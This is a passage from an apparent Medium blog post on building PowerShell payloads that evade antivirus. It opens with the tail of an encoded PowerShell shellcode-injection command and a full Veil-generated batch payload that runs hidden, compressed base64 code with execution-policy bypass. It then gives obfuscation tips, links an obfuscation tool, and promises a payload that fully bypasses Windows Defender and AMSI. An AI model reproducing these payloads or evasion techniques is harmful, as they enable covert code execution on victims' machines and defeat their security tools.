AAsADAAeABhADEALAAwAHgANQA4ACwAMAB4ADkAYwAsADAAeAA0AGQALAAwAHgAYwBhACwAMAB4ADUAOAAsADAAeAA5AGMALAAwAHgAMABkACwAMAB4ADAAYQAsADAAeAAwAGEALAAwAHgAZgA0ACwAMAB4AGQANQAsADAAeABhAGUALAAwAHgAZgBmACwAMAB4AGUAMQAsADAAeAAxAGEALAAwAHgANwBiACwAMAB4ADYAYwAsADAAeABiAGEALAAwAHgAYgA3ACwAMAB4ADAAZAAsADAAeAA3ADQALAAwAHgANgBhACwAMAB4ADUAZgAsADAAeAAwAGUALAAwAHgANQBiACwAMAB4ADkANQAsADAAeAA5AGYALAAwAHgANQBkACwAMAB4AGMAZAAsADAAeABmAGQALAAwAHgAOABkACwAMAB4AGYANwAsADAAeAA3ADgALAAwAHgAMQBmACwAMAB4ADQAZQAsADAAeAAyADIALAAwAHgAZgBmACwAMAB4ADIAMAAsADAAeABjADQALAAwAHgAMAAwACwAMAB4ADgAYgAsADAAeABhADYALAAwAHgAMgA1ACwAMAB4ADUAOAAsADAAeAAwADkALAAwAHgANgA4ACwAMAB4ADUAMAAsADAAeABiAGIALAAwAHgANABhACwAMAB4AGEAYQAsADAAeABjADUALAAwAHgAYQBiACwAMAB4ADEANgAsADAAeABkADMALAAwAHgAMAA2ACwAMAB4AGQANAAsADAAeABkADgALAAwAHgAMQAyACwAMAB4AGMAYQAsADAAeAAwADUALAAwAHgAMgBhACwAMAB4ADUAMwAsADAAeAAxADIALAAwAHgANwA0ACwAMAB4ADcAZAAsADAAeABiADUALAAwAHgANQAzACwAMAB4AGIAOAAsADAAeAA0ADkALAAwAHgAYwA5ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJAByAFUAdABnAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAByAFUAdABnAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJAByAFUAdABnACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAagBGAEYAKQApADsAJABQAFQAdwAgAD0AIAAiAC0AZQBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABpAFEASgBIACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGkAUQBKAEgAIAAkAFAAVAB3ACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFAAVAB3ACAAJABlACIAOwB9AA=='”

Payload created with the Veil:

@echo off
if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Command “Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\”nVPbbtswDH33VxCGgdqIbTiXFl2KAr0hW4EtK5piewjy4Chso1WWDIlO4nb599Gts61FNwzzy5El8pwjkgoEHMOJ700vlLosSmMp9O/RalT9XrpQyo9mUFZzJQU4yokBN8TncKnpiix8kZaqXJ0qZUTY7q1jqKQm2LRYt/gQHf23zrnFnPBmybDY6VQt7yqGX8rt6jftdqdR9088svVj4PjSY1wnn+ffUBBMakdYpGOkdGLEPZJrEcLpG2eni4VF50Z5IVU9Gw5ZAC0HrI29j+GtjGe8qUvk8AnxJYq3A6+sISOMakNvRBl5gUvPjdZsNNzrvuul3YPDtJt2s8FeDAP+IvgOpqJEV0odQVDy3aan1uaNteeyXWquqRYY+vOa0Oe0iAM3HMjc1yhQrjAMyldED3yeeUH9D3zTM0nscYWWK9H4NlyTfo854yzq7Ddq9TSbNYSbs5G3XkqFELJCoujvyRE8Nk46L63WcfDQ2Y+78Z+LPVL5nWO2sdEYwda7NZYV5XGXvUjWRRg0q06HFdhcIBt3O7pXjt4jnfFFXTjlkZqxkQ+5XiiMOCvpzrZeQJzLU5E0bYOkwGKO9gJvpZYkjYZAQDLOCwT/q9T9ng+J5j9X5gLhaWdUadFEOkjK3Dla2qpp0HFAw+GLF5bFQZ1+RH1Hyzjb9LMsYxhkkbdzfl1pkgWmTzNpygnalRTo0k+5dctcNS00Zd1UEDLu2/PbmIXBJt2VPYpi+CnC00e7rrePjxXjYBM3kL2cmAnllpKJQiwhmaAwegGHB4Ms24qcxPJx+wM=\”)))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();”) else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command “Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\”nVPbbtswDH33VxCGgdqIbTiXFl2KAr0hW4EtK5piewjy4Chso1WWDIlO4nb599Gts61FNwzzy5El8pwjkgoEHMOJ700vlLosSmMp9O/RalT9XrpQyo9mUFZzJQU4yokBN8TncKnpiix8kZaqXJ0qZUTY7q1jqKQm2LRYt/gQHf23zrnFnPBmybDY6VQt7yqGX8rt6jftdqdR9088svVj4PjSY1wnn+ffUBBMakdYpGOkdGLEPZJrEcLpG2eni4VF50Z5IVU9Gw5ZAC0HrI29j+GtjGe8qUvk8AnxJYq3A6+sISOMakNvRBl5gUvPjdZsNNzrvuul3YPDtJt2s8FeDAP+IvgOpqJEV0odQVDy3aan1uaNteeyXWquqRYY+vOa0Oe0iAM3HMjc1yhQrjAMyldED3yeeUH9D3zTM0nscYWWK9H4NlyTfo854yzq7Ddq9TSbNYSbs5G3XkqFELJCoujvyRE8Nk46L63WcfDQ2Y+78Z+LPVL5nWO2sdEYwda7NZYV5XGXvUjWRRg0q06HFdhcIBt3O7pXjt4jnfFFXTjlkZqxkQ+5XiiMOCvpzrZeQJzLU5E0bYOkwGKO9gJvpZYkjYZAQDLOCwT/q9T9ng+J5j9X5gLhaWdUadFEOkjK3Dla2qpp0HFAw+GLF5bFQZ1+RH1Hyzjb9LMsYxhkkbdzfl1pkgWmTzNpygnalRTo0k+5dctcNS00Zd1UEDLu2/PbmIXBJt2VPYpi+CnC00e7rrePjxXjYBM3kL2cmAnllpKJQiwhmaAwegGHB4Ms24qcxPJx+wM=\”)))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();”)

You can see three cases of payloads which are encoded and all of them are
slightly different. But the point all of them is, when they get executed the
powershell decode the string and inject the payload into the memory.

This trick was working for a while, until vendors patched the payloads generated
with the moste popular payload generators. But attackers and developers were
still updating the payloads with obfuscation and changing signatures. As soon as
you change the signature of payload which is not already in antivirus database
it could not be detected. Here is the way how this could be done.

For example you can replace powershell commands with the shorten one:

NoExit = -NoE
EncodedCommand = -Enc
Command = -C

and so on…

For example you can obfuscate commands:

Invoke-Expression = "In"+"vok"+"e"+"-E"+"xpre"+"ssion"

Obfuscation could be done on many ways, and I will not dig deep into due to it
is really large field and will left this topic for another story. But here is
the link where you can find really cool script obfuscator, which makes all heavy
lifting for you: https://github.com/danielbohannon/Invoke-Obfuscation.

We covered how the powershell payloads were developing with the time and how
encoding and obfuscation tricks were used to avoid detection. But unfortunately
today it does not work so easy. The reason is that Microsoft has made really big
step forward in security and with the april 2018 update (build 1803) changed the
rules of the game. Windows get the big update, and since then they are getting
better and better. I mean, now it is not enough just to avoid detection when the
payload file is downloaded on victim computer, because when the payload is
executed, windows defender after decoding payload, scan the code again. If in
the code is included any suspicious command e.g. VirtualAlloc, CreateThread,
etc. he will send the code in the cloud for additionally analysis and will stop
execution until get sure the code is not harmful. Sometimes it takes a day after
you receive notification that the executed file is malicious. So the next step
is to obfuscate the powershell payload before it is encoded or even need to
recompile the whole code.

I hope that I give you tips and orientation where and how to continue the work
to create powerful payload which will fully bypass detection. You also need to
take into account that Microsoft defender ATP is integrated with AMSI, which is
very effective against obfuscation. But remember, there is always the way.

For the end of this story I will post a link to my github repository, where you
can find payload, which can fully bypass detection and it works on Windows 10
and 11. What is really interesting, when yesterday I tried this code after 2
years and it was still working I was really shocked. Why I was shocked. Well, it
is on github, it is in the wild, and I do not know why it is not yet patched.
How vendors did not found it yet, especially Microsoft, who is also owner of
github, and I assumed that maybe they have more insight what is uploading on it.
And even one more shock. This payload also works for Windows 11, which was not
even released when the code was made.




60



1



60

60

1




SIGN UP FOR INFOSEC WRITEUPS


BY INFOSEC WRITE-UPS

Newsletter from Infosec Writeups Take a look.

By signing up, you will create a Medium account if you don’t already have one.
Review our Privacy Policy for more information about our privacy practices.

Get this newsletter


MORE FROM INFOSEC WRITE-UPS

Follow

A collection of write-ups from the best hackers in the world on topics ranging
from bug bounties and CTFs to vulnhub machines, hardware challenges and real
life encounters. In a nutshell, we are the largest InfoSec publication on
Medium.

Dhanesh Dodia - HeyDanny

·Apr 30


CHOOSING YOUR JOB ROLE / CAREER IN CYBER SECURITY

1: Threat Hunter This expert applies new threat intelligence against existing
evidence to identify attackers that have slipped through real-time detection
mechanisms. The practice of threat hunting requires several skill sets,
including threat intelligence, system and network forensics, and investigative
development processes. …

Cybersecurity

10 min read





--------------------------------------------------------------------------------

Share your ideas with millions of readers.

Write on Medium

--------------------------------------------------------------------------------

Barak Aharoni

·Apr 29


SHELLCODE ANALYSIS

Let’s see what shellcodes are and how we can Identify and Analyze them.
Background Shellcode is a sequence of instructions (Opcodes) that represent
hex-values and can appear in variant formats in the code (as strings). This
sequence is used as a payload of the code to execute in memory after exploiting…

Shellcode

6 min read





--------------------------------------------------------------------------------

Mukilan Baskaran

·Apr 28


PICOCTF 2022 WEB EXPLOITATION

Includes, Insp3ct0r, where are the robots, Power Cookie — Welcome back amazing
hackers, after a long time I am boosted again by posting a blog on another
interesting jeopardy CTF challenge PicoCTF 2022. In this write-up, we are going
to see some of the web exploitation challenges. First Challenge Insp3ct0r

Picoctf

3 min read





--------------------------------------------------------------------------------

Manash

·Apr 27


HACKING IPMI AND ZABBIX IN HACKTHEBOX — SHIBBOLETH

Port Scanning TCP Add shibboleth.htb to /etc/hosts file. UDP Other ports found
were in open|filtered STATE and I'm not including them here in the results. Web
Server enumeration vHost scanning We will use ffufto perform vhost scanning.
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -o
ffuf-vhosts.out -u http://shibboleth.htb -H -fw 18 Found vHosts: monitor
monitoring zabbix

Hacking

6 min read





--------------------------------------------------------------------------------

Shekhar Jha

·Apr 27


USING PGP TO ENHANCE SECURITY AND NON-REPUDIATION OF TERRAFORM OPS

Terraform has transitioned to a lingua franca for multi-cloud infrastructure as
a code. …

Dev Ops

5 min read





--------------------------------------------------------------------------------

Read more from InfoSec Write-ups


RECOMMENDED FROM MEDIUM

Matt Fuller

AWS ACCOUNTS AS SECURITY BOUNDARIES — 97+WAYS DATA CAN BE SHARED ACROSS ACCOUNTS



Avery Phillips

in

Code Like A Girl

WOMEN & CYBERSECURITY: CURRENT TRENDS AND FUTURE POSSIBILITIES



Masd.Games

A LOT OF BEAUTIFUL GREENERY



autofarm.network

in

autofarm.network

NEW VAULTS (PANCAKESWAP BSC)



Cyberprakash

FIRST SCAN IN NESSUS



Len Epp

WHY THE INCUMBENT HIERARCHY HATES COMPUTERS AND THE INTERNET



Alejandro De León

DIGITAL FINGERPRINT



Jessica Barnaby

in

Wednesday Genius

HOW TO DEAL WITH WEBSITE SCRAPING & COPYRIGHT INFRINGEMENT



AboutHelpTermsPrivacy

--------------------------------------------------------------------------------


GET THE MEDIUM APP


Get started

Sign In




LEOX


37 Followers


I am enthusiastic “hacker”, “programmer”, and I am in love into computer
technology. This are my hobbies, and I was hooked in before hacking was even
illegal.


Follow



MORE FROM MEDIUM

Graham Zemel

in

The Gray Area

THE LATEST AND GREATEST HACKING TOOL OF 2022



nynan

WHAT I LEARNT FROM READING 217* SUBDOMAIN TAKEOVER BUG REPORTS.



N3NU

YOU MUST KNOW THESE NMAP SCANS



Graham Zemel

in

The Gray Area

A $250 ENTIRELY AUTOMATED BUG BOUNTY



Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Text to speech

To make Medium work, we log user data. By using Medium, you agree to our Privacy
Policy, including cookie policy.